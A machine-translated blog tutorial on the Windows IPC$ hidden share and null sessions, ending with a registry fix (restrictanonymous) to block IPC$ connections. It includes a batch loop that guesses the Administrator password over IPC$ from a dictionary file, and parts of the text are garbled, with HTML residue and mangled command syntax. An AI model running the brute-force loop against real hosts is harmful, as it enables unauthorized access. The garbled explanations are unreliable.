Run the "net share" command in Windows to view the sharing. In addition to the hidden sharing enabled by the system by default, there is also a hidden sharing named IPC $.
650) This. width = 650; "style =" border-bottom: 0px; border-left: 0px; border-top: 0px; border-Right: 0px; "Title =" image "border =" 0 "alt =" image "src =" http://img1.51cto.com/attachment/201411/1/70821_1414808901iJM5.png "Height =" 167 "/>
This IPC $ is a big name in the hacking industry. Of course it was a long time ago. The main function of IPC $ is to connect to a shared connection. We know that when the client accesses the file server, you must enter the user name and password for authentication. After the authentication is passed, a shared connection is established between the client and the server, you can use the net use command to manage shared connections. For more information, see http://yttitan.blog.51cto.com/70821/1336646.
Generally, when the client accesses the server, it first performs authentication and then establishes a shared connection. By using IPC $, you can directly establish a shared connection, so that you do not need to perform authentication when accessing the file server.
For example, run the following command on the client (123 is the password of the administrator user ):
650) This. width = 650; "style =" border-bottom: 0px; border-left: 0px; border-top: 0px; border-Right: 0px; "Title =" image "border =" 0 "alt =" image "src =" http://img1.51cto.com/attachment/201411/1/70821_1414808901MOyg.png "Height =" 56 "/>
After the connection is established, the user can access the server directly as administrator.
In the system before WINXP SP2, if the Administrator does not set a password, the system allows the client to directly establish a connection with the server with a blank password. This is the famous IPC $ empty connection. Of course, this vulnerability has been fixed in WINXP SP2, but this IPC $ can still be used in hacker so far, for example, using it to guess the administrator password. If you have a batch processing script and a good dictionary, the power of this password is powerful.
The following is a script written in my notebook. pass.txt is a dictionary file, and 192.168.80.128is the target file. successfully guessed passwords will be stored in the 1.txt file.
For/F % A in (c: \ pass.txt) Do net use \ 192.168.80.128 \ IPC $/User: Administrator % A & Echo % A 1> 1.txt
There are two ways to prevent such attacks:
The first method is to disable IPC $. The method to disable IPC $ is to stop the server service. If the server service is stopped, file sharing is disabled. Therefore, this method is not recommended.
The second method is to disable the establishment of an IPC $ connection. This is a recommended method. You need to modify the registry for specific operations. Expand [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA \ restrictanonymous] and change the value to 1.
650) This. width = 650; "style =" border-bottom: 0px; border-left: 0px; border-top: 0px; border-Right: 0px; "Title =" image "border =" 0 "alt =" image "src =" http://img1.51cto.com/attachment/201411/1/70821_1414808901FU0e.png "Height =" 378 "/>
This article is from the "one pot of turbidity wine" blog. For more information, please contact the author!
The Network Security Series 19th prohibits the establishment of an IPC $ connection